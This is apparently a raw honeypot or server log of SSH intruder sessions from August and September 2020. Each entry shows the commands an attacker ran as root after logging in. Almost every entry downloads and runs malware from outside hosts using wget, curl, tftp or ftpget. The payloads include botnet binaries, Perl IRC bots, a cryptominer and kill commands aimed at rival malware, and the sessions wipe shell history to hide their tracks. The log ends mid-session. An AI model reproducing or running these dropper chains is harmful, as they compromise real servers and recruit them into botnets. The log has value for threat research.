ROOTED history -c From 185.132.53.11 11-Aug-2020 07:14:41 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.118/DARLING.sh; chmod 777 *; sh DARLING.sh; tftp -g 194.180.224.118 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://194.180.224.118/DARLING.sh chmod 777 * sh DARLING.sh tftp -g 194.180.224.118 -r tftp1.sh chmod 777 * sh tftp1.sh rm -rf *.sh history -c From 212.33.203.201 11-Aug-2020 07:22:41 ssh2 root Exec cd /tmp; wget http://212.33.203.199/x-8.6-.SNOOPY; chmod 777 *; ./x-8.6-.SNOOPY roots; rm -rf * cd /tmp wget http://212.33.203.199/x-8.6-.SNOOPY chmod 777 * ./x-8.6-.SNOOPY roots rm -rf * From 163.172.161.31 11-Aug-2020 22:43:19 ssh2 root Exec cat /etc/issue ; wget 163.172.161.31/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c cat /etc/issue wget 163.172.161.31/bot.pl perl bot.pl rm -rf bot.pl history -c From 193.228.91.109 12-Aug-2020 04:54:19 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.105/vsUerS.sh; curl -O http://193.228.91.105/vsUerS.sh; chmod 777 vsUerS.sh; sh vsUerS.sh; tftp 193.228.91.105 -c get tfJDs1.sh; chmod 777 tfJDs1.sh; sh tfJDs1.sh; tftp -r tftSdvkzb.sh -g 193.228.91.105; chmod 777 tftSdvkzb.sh; sh tftSdvkzb.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.105 ftpSedr1.sh ftpSedr1.sh; sh ftpSedr1.sh; rm -rf vsUerS.sh tfJDs1.sh tftSdvkzb.sh ftpSedr1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://193.228.91.105/vsUerS.sh curl -O http://193.228.91.105/vsUerS.sh chmod 777 vsUerS.sh sh vsUerS.sh tftp 193.228.91.105 -c get tfJDs1.sh chmod 777 tfJDs1.sh sh tfJDs1.sh tftp -r tftSdvkzb.sh -g 193.228.91.105 chmod 777 tftSdvkzb.sh sh tftSdvkzb.sh ftpget -v -u anonymous -p anonymous -P 21 193.228.91.105 ftpSedr1.sh ftpSedr1.sh sh ftpSedr1.sh rm -rf vsUerS.sh tfJDs1.sh tftSdvkzb.sh ftpSedr1.sh rm -rf * From 194.15.36.19 12-Aug-2020 08:27:14 ssh2 root Exec wget http://45.95.168.201/beastmode/b3astmode.x86; chmod 777 b3astmode.x86; ./b3astmode.x86 roots; rm -rf b3astmode.* wget http://45.95.168.201/beastmode/b3astmode.x86 chmod 777 b3astmode.x86 ./b3astmode.x86 roots rm -rf b3astmode.* From 37.49.224.88 12-Aug-2020 11:42:54 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://37.49.224.87/stableisbest/savanne.x86; cat savanne.x86 > dcfsd0cvs3ds12c; chmod +x dcfsd0cvs3ds12c; ./dcfsd0cvs3ds12c Rooted.VPS; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://37.49.224.87/stableisbest/savanne.x86 cat savanne.x86 > dcfsd0cvs3ds12c chmod +x dcfsd0cvs3ds12c ./dcfsd0cvs3ds12c Rooted.VPS history -c From 167.71.77.125 12-Aug-2020 14:41:58 ssh2 root Exec cd /tmp; wget http://185.172.111.226/bins.sh; chmod 777 *; sh bins.sh; tftp -g 185.172.111.226 -r tftp.sh; chmod 777 *; sh tftp.sh; rm -rf *.sh cd /tmp wget http://185.172.111.226/bins.sh chmod 777 * sh bins.sh tftp -g 185.172.111.226 -r tftp.sh chmod 777 * sh tftp.sh rm -rf *.sh From 45.95.168.138 12-Aug-2020 23:25:49 ssh2 root Exec cd /tmp || cd /var/tmp || cd /run || cd /home || cd /var || cd /etc || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.95.168.138/roots.sh; curl -O http://45.95.168.138/roots.sh; chmod 777 roots.sh;sh roots.sh cd /tmp || cd /var/tmp || cd /run || cd /home || cd /var || cd /etc || cd /var/run || cd /mnt || cd /root || cd / wget http://45.95.168.138/roots.sh curl -O http://45.95.168.138/roots.sh chmod 777 roots.sh sh roots.sh From 37.49.230.229 13-Aug-2020 14:57:15 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://37.49.224.153/dirdir000/0s1s12.x86; cat 0s1s12.x86 > z1z2z5a6qw5asda; chmod +x z1z2z5a6qw5asda; ./z1z2z5a6qw5asda Rooted.VPS; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://37.49.224.153/dirdir000/0s1s12.x86 cat 0s1s12.x86 > z1z2z5a6qw5asda chmod +x z1z2z5a6qw5asda ./z1z2z5a6qw5asda Rooted.VPS history -c From 95.211.79.114 13-Aug-2020 22:10:56 ssh2 root Exec cat /etc/issue ; wget 163.172.161.31/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; curl -O 163.172.161.31/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c ; cd /tmp || cd /run || cd /; wget http://185.252.41.232/sploitbins.sh; chmod 777 sploitbins.sh; sh sploitbins.sh; tftp 185.252.41.232 -c get sploittftp1.sh; chmod 777 sploittftp1.sh; sh sploittftp1.sh; tftp -r sploittftp2.sh -g 185.252.41.232; chmod 777 sploittftp2.sh; sh sploittftp2.sh; rm -rf sploitbins.sh sploittftp1.sh sploittftp2.sh; rm -rf * cat /etc/issue wget 163.172.161.31/bot.pl perl bot.pl rm -rf bot.pl history -c curl -O 163.172.161.31/bot.pl perl bot.pl rm -rf bot.pl history -c cd /tmp || cd /run || cd / wget http://185.252.41.232/sploitbins.sh chmod 777 sploitbins.sh sh sploitbins.sh tftp 185.252.41.232 -c get sploittftp1.sh chmod 777 sploittftp1.sh sh sploittftp1.sh tftp -r sploittftp2.sh -g 185.252.41.232 chmod 777 sploittftp2.sh sh sploittftp2.sh rm -rf sploitbins.sh sploittftp1.sh sploittftp2.sh rm -rf * From 2.57.122.186 14-Aug-2020 03:49:32 ssh2 root Exec cat /etc/issue; echo Killing; pkill w.x86; pkill b3astmode.x86; pkill loligang.x86; pkill jKira.x86; pkill 3AvA; pkill java; pkill Scylla; echo InfectedNight4life; cat /etc/issue echo Killing pkill w.x86 pkill b3astmode.x86 pkill loligang.x86 pkill jKira.x86 pkill 3AvA pkill java pkill Scylla echo InfectedNight4life From 194.180.224.103 14-Aug-2020 14:57:06 ssh2 root Exec cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://193.228.91.123/reportandyougaybins.sh; chmod 777 reportandyougaybins.sh; sh reportandyougaybins.sh; tftp 193.228.91.123 -c get reportandyougaytftp1.sh; chmod 777 reportandyougaytftp1.sh; sh reportandyougaytftp1.sh; tftp -r reportandyougaytftp2.sh -g 193.228.91.123; chmod 777 reportandyougaytftp2.sh; sh reportandyougaytftp2.sh; rm -rf reportandyougaybins.sh reportandyougaytftp1.sh reportandyougaytftp2.sh; rm -rf * cat /etc/issue cd /tmp || cd /run || cd / wget http://193.228.91.123/reportandyougaybins.sh chmod 777 reportandyougaybins.sh sh reportandyougaybins.sh tftp 193.228.91.123 -c get reportandyougaytftp1.sh chmod 777 reportandyougaytftp1.sh sh reportandyougaytftp1.sh tftp -r reportandyougaytftp2.sh -g 193.228.91.123 chmod 777 reportandyougaytftp2.sh sh reportandyougaytftp2.sh rm -rf reportandyougaybins.sh reportandyougaytftp1.sh reportandyougaytftp2.sh rm -rf * From 212.33.203.228 15-Aug-2020 07:52:53 ssh2 root Exec cd /tmp; wget http://212.33.203.199/x-8.6-.GHOUL; chmod 777 *; ./x-8.6-.GHOUL roots; rm -rf * cd /tmp wget http://212.33.203.199/x-8.6-.GHOUL chmod 777 * ./x-8.6-.GHOUL roots rm -rf * From 193.228.91.123 15-Aug-2020 08:48:38 ssh2 root Exec wget http://ws-ebavisapia01-dll.ir/uih7U8JY7Of7Y8O9d6t68IT67R8y76t7823tg8weuq/pwnNet.x86; chmod 777 *; ./pwnNet.x86 Roots;rm -rf pwnNet.x86;rm -rf pwn*; history -c wget http://ws-ebavisapia01-dll.ir/uih7U8JY7Of7Y8O9d6t68IT67R8y76t7823tg8weuq/pwnNet.x86 chmod 777 * ./pwnNet.x86 Roots rm -rf pwnNet.x86 rm -rf pwn* history -c From 111.77.205.81 15-Aug-2020 19:07:42 ssh2 root Exec at /etc/issue ; cd /tmp ; wget 1.232.156.19/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 1.232.156.19/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c at /etc/issue cd /tmp wget 1.232.156.19/bot.pl perl bot.pl rm -rf bot.pl curl -O 1.232.156.19/bot.pl perl bot.pl rm -rf bot* history -c From 2.57.122.186 16-Aug-2020 07:23:31 ssh2 root Exec wget http://185.172.111.189/pedalcheta/cutie.x86; curl -O http://185.172.111.189/pedalcheta/cutie.x86; chmod 777 *; ./cutie.x86 infn.x86; pkill 3AvA; pkill Scylla; pkill b3astmode.x86; pkill java; pkill w.x86; pkill b3astmode.x86; pkill loligang.x86; pkill jKira.x86; pkill 3AvA; pkill java; pkill Scylla wget http://185.172.111.189/pedalcheta/cutie.x86 curl -O http://185.172.111.189/pedalcheta/cutie.x86 chmod 777 * ./cutie.x86 infn.x86 pkill 3AvA pkill Scylla pkill b3astmode.x86 pkill java pkill w.x86 pkill b3astmode.x86 pkill loligang.x86 pkill jKira.x86 pkill 3AvA pkill java pkill Scylla From 1.232.156.19 18-Aug-2020 04:13:07 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 1.232.156.19/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 1.232.156.19/bot.pl ; perl bot.pl ; rm -rf bot* ; history -c cat /etc/issue cd /tmp wget 1.232.156.19/bot.pl perl bot.pl rm -rf bot.pl curl -O 1.232.156.19/bot.pl perl bot.pl rm -rf bot* history -c From 45.95.168.172 18-Aug-2020 09:02:17 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://185.172.110.185/0xxx0xxxasdajshdsajhkgdja/m3th.x86; cat m3th.x86 > sn0rt; chmod +x sn0rt; ./sn0rt ROOTED; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://185.172.110.185/0xxx0xxxasdajshdsajhkgdja/m3th.x86 cat m3th.x86 > sn0rt chmod +x sn0rt ./sn0rt ROOTED history -c From 159.203.90.161 18-Aug-2020 13:39:02 ssh2 root Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;killall -9 ident;killall -9 super;killall -9 atd;killall -9 [rpc];killall -9 sync_time;cd /var/tmp;cd /dev/shm;cd /tmp;rm -rf px.txt;wget -q 203.146.208.208/drago/images/.x/px.txt || curl -O -f -s 203.146.208.208/drago/images/.x/px.txt;perl px.txt;rm -rf px.txt uname -a unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH history -n export HISTFILE=/dev/null killall -9 ident killall -9 super killall -9 atd killall -9 [rpc] killall -9 sync_time cd /var/tmp cd /dev/shm cd /tmp rm -rf px.txt wget -q 203.146.208.208/drago/images/.x/px.txt || curl -O -f -s 203.146.208.208/drago/images/.x/px.txt perl px.txt rm -rf px.txt From 188.161.105.217 19-Aug-2020 02:31:32 ssh2 root مس ls free -m From 185.63.253.51 19-Aug-2020 10:24:45 ssh2 root Exec cd /tmp; wget http://185.63.253.157/aut/aut.x86; chmod 777 aut.x86; ./aut.x86 server; rm -rf * cd /tmp wget http://185.63.253.157/aut/aut.x86 chmod 777 aut.x86 ./aut.x86 server rm -rf * From 45.95.168.190 19-Aug-2020 10:25:52 ssh2 root Exec wget http://hydradown.xyz/beastmode/b3astmode.x86; chmod 777 b3astmode.x86; ./b3astmode.x86 roots wget http://hydradown.xyz/beastmode/b3astmode.x86 chmod 777 b3astmode.x86 ./b3astmode.x86 roots Exec cd /tmp; wget http://149.3.170.217/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86; chmod 777 *; ./zbetcheckin.x86 servers; rm -rf * cd /tmp wget http://149.3.170.217/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86 chmod 777 * ./zbetcheckin.x86 servers rm -rf * From 107.172.141.105 19-Aug-2020 10:27:21 ssh2 root Exec wget http://hydradown.xyz/beastmode/b3astmode.x86; chmod 777 b3astmode.x86; ./b3astmode.x86 roots wget http://hydradown.xyz/beastmode/b3astmode.x86 chmod 777 b3astmode.x86 ./b3astmode.x86 roots From 45.95.168.190 19-Aug-2020 16:08:34 ssh2 root Exec cd /tmp; wget http://149.3.170.217/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86; chmod 777 *; ./zbetcheckin.x86 servers; rm -rf * cd /tmp wget http://149.3.170.217/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86 chmod 777 * ./zbetcheckin.x86 servers rm -rf * From 193.228.91.123 19-Aug-2020 23:47:41 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.124/pwnInfect.sh; curl -O http://193.228.91.124/pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp 193.228.91.124 -c get pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp -r pwnInfect2.sh -g 193.228.91.124; chmod 777 pwnInfect2.sh; sh pwnInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.124 pwnInfect1.sh pwnInfect1.sh; sh pwnInfect1.sh; rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://193.228.91.124/pwnInfect.sh curl -O http://193.228.91.124/pwnInfect.sh chmod 777 pwnInfect.sh sh pwnInfect.sh tftp 193.228.91.124 -c get pwnInfect.sh chmod 777 pwnInfect.sh sh pwnInfect.sh tftp -r pwnInfect2.sh -g 193.228.91.124 chmod 777 pwnInfect2.sh sh pwnInfect2.sh ftpget -v -u anonymous -p anonymous -P 21 193.228.91.124 pwnInfect1.sh pwnInfect1.sh sh pwnInfect1.sh rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh rm -rf * From 104.131.90.56 20-Aug-2020 13:22:59 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.173.213.43/Snoopy.sh; chmod 777 Snoopy.sh; sh Snoopy.sh; tftp 107.173.213.43 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 107.173.213.43; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://107.173.213.43/Snoopy.sh chmod 777 Snoopy.sh sh Snoopy.sh tftp 107.173.213.43 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 107.173.213.43 chmod 777 tftp2.sh sh tftp2.sh rm -rf * From 194.15.36.104 22-Aug-2020 03:59:02 ssh2 root Exec wget http://194.87.138.205/bins/jKira.x86; chmod 777 jKira.x86; ./jKira.x86 roots; rm -rf jKira.* ; history -c wget http://194.87.138.205/bins/jKira.x86 chmod 777 jKira.x86 ./jKira.x86 roots rm -rf jKira.* history -c From 83.149.99.8 23-Aug-2020 05:31:49 ssh2 root Exec cat /etc/issue ; wget 121.48.164.46/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 121.48.164.46/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c cat /etc/issue wget 121.48.164.46/bot.pl perl bot.pl rm -rf bot.pl curl -O 121.48.164.46/bot.pl perl bot.pl rm -rf bot.pl history -c From 83.149.99.8 23-Aug-2020 12:20:44 ssh2 root Exec cat /etc/issue ; wget 83.149.99.8/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 83.149.99.8/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c cat /etc/issue wget 83.149.99.8/bot.pl perl bot.pl rm -rf bot.pl curl -O 83.149.99.8/bot.pl perl bot.pl rm -rf bot.pl history -c From 188.166.9.196 24-Aug-2020 03:08:14 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.175.95.101/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 107.175.95.101 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 107.175.95.101; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 107.175.95.101 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://107.175.95.101/bins.sh chmod 777 bins.sh sh bins.sh tftp 107.175.95.101 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 107.175.95.101 chmod 777 tftp2.sh sh tftp2.sh ftpget -v -u anonymous -p anonymous -P 21 107.175.95.101 ftp1.sh ftp1.sh sh ftp1.sh rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh rm -rf * From 193.239.147.60 24-Aug-2020 13:09:05 ssh2 root Exec cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://194.180.224.118/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 194.180.224.118 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c cd /tmp cd /var/run cd /mnt cd /root cd / wget http://194.180.224.118/SnOoPy.sh chmod 777 * sh SnOoPy.sh tftp -g 194.180.224.118 -r tftp1.sh chmod 777 * sh tftp1.sh rm -rf *.sh history -c From 206.189.179.73 24-Aug-2020 23:36:45 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.175.95.101/skid.sh; chmod 777 skid.sh; sh skid.sh; tftp 107.175.95.101 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 107.175.95.101; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://107.175.95.101/skid.sh chmod 777 skid.sh sh skid.sh tftp 107.175.95.101 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 107.175.95.101 chmod 777 tftp2.sh sh tftp2.sh rm -rf * From 45.95.168.130 25-Aug-2020 01:21:27 ssh2 root Exec cat /etc/issue ; cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://37.49.224.207/FuckBitchBastardDamnCuntJesusHaroldChristbins.sh; chmod 777 FuckBitchBastardDamnCuntJesusHaroldChristbins.sh; sh FuckBitchBastardDamnCuntJesusHaroldChristbins.sh; rm -rf * cat /etc/issue cat /etc/issue cd /tmp || cd /run || cd / wget http://37.49.224.207/FuckBitchBastardDamnCuntJesusHaroldChristbins.sh chmod 777 FuckBitchBastardDamnCuntJesusHaroldChristbins.sh sh FuckBitchBastardDamnCuntJesusHaroldChristbins.sh rm -rf * From 45.95.168.172 25-Aug-2020 04:48:03 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://185.172.110.175/0xxx0xxxasdajshdsajhkgdja/m3th.x86; cat m3th.x86 > sn0rt; chmod +x sn0rt; ./sn0rt ROOTED; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://185.172.110.175/0xxx0xxxasdajshdsajhkgdja/m3th.x86 cat m3th.x86 > sn0rt chmod +x sn0rt ./sn0rt ROOTED history -c From 104.248.32.4 25-Aug-2020 06:02:19 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://149.56.26.173/dirdir000/0s1s12.x86; cat 0s1s12.x86 > z1z2z5a6qw5asda; chmod +x z1z2z5a6qw5asda; ./z1z2z5a6qw5asda Rooted.VPS; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://149.56.26.173/dirdir000/0s1s12.x86 cat 0s1s12.x86 > z1z2z5a6qw5asda chmod +x z1z2z5a6qw5asda ./z1z2z5a6qw5asda Rooted.VPS history -c From 159.203.90.161 25-Aug-2020 15:41:07 ssh2 root Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;cd /var/tmp;cd /dev/shm;cd /tmp;wget -q 203.146.208.208/drago/images/.x/px.txt || curl -O -f -s 203.146.208.208/drago/images/.x/px.txt;perl px.txt;rm -rf px.txt uname -a unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH history -n export HISTFILE=/dev/null cd /var/tmp cd /dev/shm cd /tmp wget -q 203.146.208.208/drago/images/.x/px.txt || curl -O -f -s 203.146.208.208/drago/images/.x/px.txt perl px.txt rm -rf px.txt From 176.247.194.75 26-Aug-2020 02:20:20 ssh2 root w wget From 185.132.53.194 27-Aug-2020 00:54:09 ssh2 root Exec wget http://45.95.168.201/wkomqp; chmod 777 wkomqp; ./wkomqp roots; rm -rf wkomqp* ; history -c wget http://45.95.168.201/wkomqp chmod 777 wkomqp ./wkomqp roots rm -rf wkomqp* history -c From 91.200.102.244 27-Aug-2020 13:35:49 ssh2 root Exec busybox wget http://107.172.197.101/pedalcheta/cutie.x86_64; wget http://107.172.197.101/pedalcheta/cutie.x86_64; curl -O http://107.172.197.101/pedalcheta/cutie.x86_64; chmod 777 cutie.x86_64; ./cutie.x86_64 MINECRAFT; rm -rf *; echo pozdravi za vessonsecurity ot ghosta i accrobata hackerite busybox wget http://107.172.197.101/pedalcheta/cutie.x86_64 wget http://107.172.197.101/pedalcheta/cutie.x86_64 curl -O http://107.172.197.101/pedalcheta/cutie.x86_64 chmod 777 cutie.x86_64 ./cutie.x86_64 MINECRAFT rm -rf * echo pozdravi za vessonsecurity ot ghosta i accrobata hackerite From 185.132.53.126 29-Aug-2020 05:03:03 ssh2 root Exec wget http://185.132.53.238/x86; chmod 777 x86; ./x86; rm -rf x86; history -c wget http://185.132.53.238/x86 chmod 777 x86 ./x86 rm -rf x86 history -c From 148.70.68.36 29-Aug-2020 05:31:57 ssh2 root Exec ping 8.8.8.8 ping 8.8.8.8 Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l From 212.33.199.3 30-Aug-2020 01:24:46 ssh2 root Exec cd /tmp; wget http://172.245.104.116/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86_64; chmod 777 *; ./zbetcheckin.x86_64 mnimaan; rm -rf * cd /tmp wget http://172.245.104.116/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86_64 chmod 777 * ./zbetcheckin.x86_64 mnimaan rm -rf * From 194.180.224.130 1-Sep-2020 16:09:14 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.110/bot.sh; curl -O http://193.228.91.110/bot.sh; chmod 777 bot.sh; sh bot.sh; tftp 193.228.91.110 -c get tbot.sh; chmod 777 tbot.sh; sh tbot.sh; tftp -r tbot2.sh -g 193.228.91.110; chmod 777 tbot2.sh; sh tbot2.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.110 bot1.sh bot1.sh; sh bot1.sh; rm -rf bot.sh tbot.sh tbot2.sh bot1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://193.228.91.110/bot.sh curl -O http://193.228.91.110/bot.sh chmod 777 bot.sh sh bot.sh tftp 193.228.91.110 -c get tbot.sh chmod 777 tbot.sh sh tbot.sh tftp -r tbot2.sh -g 193.228.91.110 chmod 777 tbot2.sh sh tbot2.sh ftpget -v -u anonymous -p anonymous -P 21 193.228.91.110 bot1.sh bot1.sh sh bot1.sh rm -rf bot.sh tbot.sh tbot2.sh bot1.sh rm -rf * From 121.48.164.46 1-Sep-2020 16:48:56 ssh2 root Exec cat /etc/issue ; cd /tmp ; wget 34.96.189.100/bot.pl ; perl bot.pl ; rm -rf bot.pl ; curl -O 34.96.189.100/bot.pl ; perl bot.pl ; rm -rf bot.pl ; history -c cat /etc/issue cd /tmp wget 34.96.189.100/bot.pl perl bot.pl rm -rf bot.pl curl -O 34.96.189.100/bot.pl perl bot.pl rm -rf bot.pl history -c From 45.84.196.99 1-Sep-2020 17:21:11 ssh2 root Exec wget http://185.132.53.238/wkomqp; chmod 777 wkomqp; ./wkomqp; rm -rf wkomqp; history -c wget http://185.132.53.238/wkomqp chmod 777 wkomqp ./wkomqp rm -rf wkomqp history -c From 45.95.168.131 1-Sep-2020 21:43:02 ssh2 root Exec cat /etc/issue ; payload cat /etc/issue payload From 88.218.17.245 2-Sep-2020 02:27:37 ssh2 root Exec cd /tmp; wget http://88.218.16.60/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86_64; chmod 777 *; ./zbetcheckin.x86_64 servers; rm -rf * cd /tmp wget http://88.218.16.60/HOPEIDONTHITTHEurlhausabuseLOL/zbetcheckin.x86_64 chmod 777 * ./zbetcheckin.x86_64 servers rm -rf * From 107.173.213.43 2-Sep-2020 11:20:19 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://172.245.112.72/SnOoPy.sh; chmod 777 *; sh SnOoPy.sh; tftp -g 172.245.112.72 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://172.245.112.72/SnOoPy.sh chmod 777 * sh SnOoPy.sh tftp -g 172.245.112.72 -r tftp1.sh chmod 777 * sh tftp1.sh rm -rf *.sh history -c From 161.35.126.137 2-Sep-2020 16:58:15 ssh2 root Exec wget http://192.3.251.67/bins/Formula.x86; chmod 777 Formula.x86; ./Formula.x86 roots; rm -rf Formula.* ; history -c wget http://192.3.251.67/bins/Formula.x86 chmod 777 Formula.x86 ./Formula.x86 roots rm -rf Formula.* history -c From 172.245.186.114 2-Sep-2020 19:26:18 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://172.245.5.102/GhOul.sh; chmod 777 GhOul.sh; sh GhOul.sh; tftp 172.245.5.102 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 172.245.5.102; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 172.245.5.102 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://172.245.5.102/GhOul.sh chmod 777 GhOul.sh sh GhOul.sh tftp 172.245.5.102 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 172.245.5.102 chmod 777 tftp2.sh sh tftp2.sh ftpget -v -u anonymous -p anonymous -P 21 172.245.5.102 ftp1.sh ftp1.sh sh ftp1.sh rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh rm -rf * From 120.92.174.161 3-Sep-2020 05:01:46 ssh2 root Exec nproc;uname -a;cd /tmp;rm -rf serv*;wget http://200.6.78.183/wp-content/uploads/2020/08/serv.tar.gz; tar xf serv.tar.gz;cd serv;perl ug.txt;rm -rf ug.txt;mv xmrig server;./server nproc uname -a cd /tmp rm -rf serv* wget http://200.6.78.183/wp-content/uploads/2020/08/serv.tar.gz tar xf serv.tar.gz cd serv perl ug.txt rm -rf ug.txt mv xmrig server ./server From 161.35.126.137 4-Sep-2020 01:22:43 ssh2 root Exec wget http://192.3.251.67/bins/Formula.x86 ; chmod 777 Formula.x86 ; ./Formula.x86 roots ; rm -rf Formula.* ; history -c wget http://192.3.251.67/bins/Formula.x86 chmod 777 Formula.x86 ./Formula.x86 roots rm -rf Formula.* history -c From 212.33.203.172 4-Sep-2020 03:45:48 ssh2 root Exec cd /tmp; wget http://87.107.146.227/21337321781278fhghdsghfshdvhjcfgdcfhhbgshfjhnhhsvjngjghfvhfgvhh.x86; chmod 777 *; ./21337321781278fhghdsghfshdvhjcfgdcfhhbgshfjhnhhsvjngjghfvhfgvhh.x86 root; rm -rf * cd /tmp wget http://87.107.146.227/21337321781278fhghdsghfshdvhjcfgdcfhhbgshfjhnhhsvjngjghfvhfgvhh.x86 chmod 777 * ./21337321781278fhghdsghfshdvhjcfgdcfhhbgshfjhnhhsvjngjghfvhfgvhh.x86 root rm -rf * From 104.168.99.225 4-Sep-2020 16:14:49 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://172.245.7.189/GhOul.sh; chmod 777 GhOul.sh; sh GhOul.sh; tftp 172.245.7.189 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 172.245.7.189; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 172.245.7.189 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf GhOul.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://172.245.7.189/GhOul.sh chmod 777 GhOul.sh sh GhOul.sh tftp 172.245.7.189 -c get tftp1.sh chmod 777 tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 172.245.7.189 chmod 777 tftp2.sh sh tftp2.sh 